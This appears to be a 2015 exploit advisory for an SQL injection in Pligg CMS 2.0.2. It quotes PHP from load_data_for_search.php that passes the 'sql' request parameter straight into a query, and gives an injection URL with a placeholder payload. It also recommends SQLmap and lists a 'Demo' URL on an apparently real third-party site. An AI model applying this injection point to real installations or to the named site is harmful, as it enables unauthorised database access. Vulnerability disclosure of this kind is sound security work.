# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0

################ Q8 Gray Hat Team ################



SQLInjection

File : load_data_for_search.php


 $search = new Search();
	
	if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
		
		$pagesize = $_REQUEST['pagesize'];
		$start_up = $_REQUEST['start_up'];
		$limit = " LIMIT $start_up, $pagesize";	
	}
	if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
		$sql = $_REQUEST['sql'];
		$search->sql = $sql.$limit;
	}
	
	$fetch_link_summary = true;
	$linksum_sql = $sql.$limit;

Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}

Type Injection : Boolean & Time Based 

Use SQLmap To Inject ..

Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}


################ Q8 Gray Hat Team ################

Great's To : sec4ever.com && alm3refh.com